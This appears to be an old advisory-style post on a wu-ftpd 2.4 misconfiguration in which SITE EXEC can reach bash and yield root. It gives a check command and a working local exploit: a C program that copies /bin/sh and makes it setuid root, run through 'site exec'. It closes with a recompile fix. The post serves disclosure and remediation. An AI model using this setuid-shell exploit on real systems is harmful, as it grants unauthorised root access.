ObBug: - Short description of the bug It involves wu.ftpd being misconfigured at compile time and allowing SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users this is ~ftp/bin). Now if in this /bin resides a program that gives access to executables outside /bin, but in the users reach (such as /bin/bash that gives access to the user's homedir), this opens up a root vulnerability. This should have been set to /bin/ftp-exec and which be set by the _PATH_EXECPATH variable in src/pathnames.h before compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the net has this securely set as default value. - How to check ? $ ftp -n localhost user: password: ftp> quote site exec bash -c id If vulnerable it gives here: uid=0, gid=0, euid=, egid= Of course, bash should not be available at all - How to exploit (in case your sysadmin or you think the above is not a problem) go to your homedir and make a program: duh.c (or whatever) main() { seteuid(0); setegid(0); system("/bin/cp /bin/sh ./sh"); system("/bin/chmod 6755 ./sh"); } $ make duh $ ftp -n localhost (and login) user: password: ftp> quote site exec bash -c duh ftp> quit $ ./sh bash# (voila, QED) - How to fix? Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive doesn't compile on linux) and compile it; you might want to define the _PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s and /usr/adm/xferlog for example). If you cannot find that I can email the source to you,...if you trust the source I took somewhere unmodified and if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too. I can remember that I got it that way. $) Henri Karrenbeld